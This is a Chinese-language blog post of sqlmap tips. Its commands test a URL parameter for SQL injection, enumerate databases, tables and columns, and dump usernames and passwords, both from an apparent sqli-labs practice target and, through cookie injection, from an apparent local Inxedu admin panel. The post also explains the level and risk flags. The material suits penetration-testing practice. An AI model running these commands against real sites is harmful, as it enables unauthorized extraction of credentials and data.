sqlMap使用技巧


猜解是否能注入
python sqlmap.py -u “http://110.40.250.105:8065/Less-6/?id=1”
用于mysq注入
查找数据库
python sqlmap.py -u “http://110.40.250.105:8065/Less-6/?id=1” –dbs
查找数据库下的表(security库)
python sqlmap.py -u “http://110.40.250.105:8065/Less-6/?id=1” -D security –tables
查找表下的列名(security 库下users表的列名)
python sqlmap.py -u “http://110.40.250.105:8065/Less-6/?id=1” -D security -T users –columns
查找字段的值(security 库下users表的”id,password,username”的值)
python sqlmap.py -u “http://110.40.250.105:8065/Less-6/?id=1” -D security -T users -C “id,password,username” –dump
cookie注人
sqlmap.py -u “http://192.168.189.1:81/admin/letter/delsystem?ids=1” –cookie “inxedulogin_sys_user_=inxedulogin_sys_user_1” –dbs –level 2
暴管理员登录密码
sqlmap.py -u “http://192.168.189.1:81/admin/letter/delsystem?ids=1” –cookie “inxedulogin_sys_user_=inxedulogin_sys_user_1” -D demo_inxedu_v2_0_open -T sys_user -C “LOGIN_NAME,LOGIN_PWD,USER_NAME” –dump –level 2

–password 查看数据库所有用户名的密码
–current-user 查看数据库当前用户
–is-dba 判断当前用户是否有管理权限
–roles 列出数据库管理员角色
–current-db 查看当前数据库
补充:–dbs爆所有数据库
爆出指定数据库指定表指定列下的数据 –dump
爆出该网站数据库中的所有数据(–dump-all)

–level 5 设置等级为5,默认是1
默认是1。等级越高,说明探测时使用的payload也越多。其中5级的payload最多,会自动破解出cookie、XFF等头部注入。
当然,等级越高,探测的时间也越慢。这个参数会影响测试的注入点,GET和POST的数据都会进行测试,
HTTP cookie在level为2时就会测试,
HTTP User-Agent/Referer头在level为3时就会测试。
在不确定哪个参数为注入点时,为了保证准确性,建议设置level为5
–risk=3 设置危险等级为3
默认风险等级为1,此等级在大多数情况下对测试目标无害。 风险等级2添加了基于时间的注入测试,等级3添加了OR测试。

https://blog.csdn.net/m0_47418965/article/details/121208978
https://blog.csdn.net/wxq8102/article/details/118627889

 

原创文章,作者:carmelaweatherly,如若转载,请注明出处:https://blog.ytso.com/273749.html

(0)
上一篇 2022年7月12日
下一篇 2022年7月12日

相关推荐

发表回复

登录后才能评论